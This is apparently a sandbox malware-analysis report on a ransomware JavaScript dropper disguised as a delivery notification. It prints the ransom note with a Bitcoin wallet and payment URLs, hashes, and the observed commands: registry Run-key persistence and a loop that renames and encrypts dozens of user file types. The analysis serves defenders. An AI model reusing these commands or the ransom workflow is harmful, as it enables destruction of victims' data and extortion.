Overview

overview

10

Static

static

Delivery_N...doc.js

windows7_x64

10

Delivery_N...doc.js

windows10_x64

10

Resubmissions

17-01-2021 18:02

210117-v36h76g17e 10

15-01-2021 15:50

210115-6zp7zwzspx 10

Analysis

  • max time kernel
    119s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    15-01-2021 15:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Delivery_Notification_00896328.doc.js

  • Size

    248KB

  • MD5

    0168089428c6aa371f4275d0872b0970

  • SHA1

    d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e

  • SHA256

    dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a

  • SHA512

    915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418

Score
10/10
persistenceransomwarespyware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\a.txt

Ransom Note
ATTENTION! All your documents, photos, databases and other important personal files were encrypted using strong RSA-1024 algorithm with a unique key. To restore your files you have to pay 0.54309 BTC (bitcoins). Please follow this manual: 1. Create Bitcoin wallet here: https://blockchain.info/wallet/new 2. Buy 0.54309 BTC with cash, using search here: https://localbitcoins.com/buy_bitcoins 3. Send 0.54309 BTC to this Bitcoin address: 19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ 4. Open one of the following links in your browser to download decryptor: http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ 5. Run decryptor to restore your files. PLEASE REMEMBER: - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES. - Nobody can help you except us. - It`s useless to reinstall Windows, update antivirus software, etc. - Your files can be decrypted only after you make payment. - You can find this manual on your desktop (DECRYPT.txt).
Wallets

19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

URLs

http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Modifies registry class 7 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:508
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Windows\system32\reg.exe
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
        3⤵
        • Adds Run key to start application
        PID:1232
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
        3⤵
        • Modifies registry class
        PID:1568
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
        3⤵
        • Modifies registry class
        PID:692
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"
      2⤵
        PID:2060
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"
        2⤵
          PID:4008
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" 2el84e983wl76brdq89zescdizbgcy3hvihx)
          2⤵
          • Modifies extensions of user files
          PID:2176

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Credentials in Files

      1
      T1081

      Discovery

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\a.txt
        MD5

        512ad548377714262b373c665f17d1db

        SHA1

        0f05efd559b90eb77418c32fa86cfcba77b6e187

        SHA256

        27966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca

        SHA512

        f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\a0.exe
        MD5

        7c7ff5fdc3cc7705f4d42ec4e3eab8a5

        SHA1

        98416dfe3086b4dfb2cbc8170b01e292ef30d982

        SHA256

        dc20be27348645f896c30914b3cbc66cdc7160702d3f307d3b1669095f483b27

        SHA512

        77fee3199567ff012dd5f617b620bbcbd5eefb940a795063e42cdaa8b2d224e810d16ce7b88544c5a429f75f9c7a9434613be4276097a8a05d9ec7fa4daab9e9

        Download Submit
      • memory/692-10-0x0000000000000000-mapping.dmp
        Download
      • memory/1232-9-0x0000000000000000-mapping.dmp
        Download
      • memory/1568-11-0x0000000000000000-mapping.dmp
        Download
      • memory/2060-5-0x0000000000000000-mapping.dmp
        Download
      • memory/2176-7-0x0000000000000000-mapping.dmp
        Download
      • memory/2868-4-0x0000000000000000-mapping.dmp
        Download
      • memory/3064-2-0x0000000000000000-mapping.dmp
        Download
      • memory/3656-3-0x0000000000000000-mapping.dmp
        Download
      • memory/4008-6-0x0000000000000000-mapping.dmp
        Download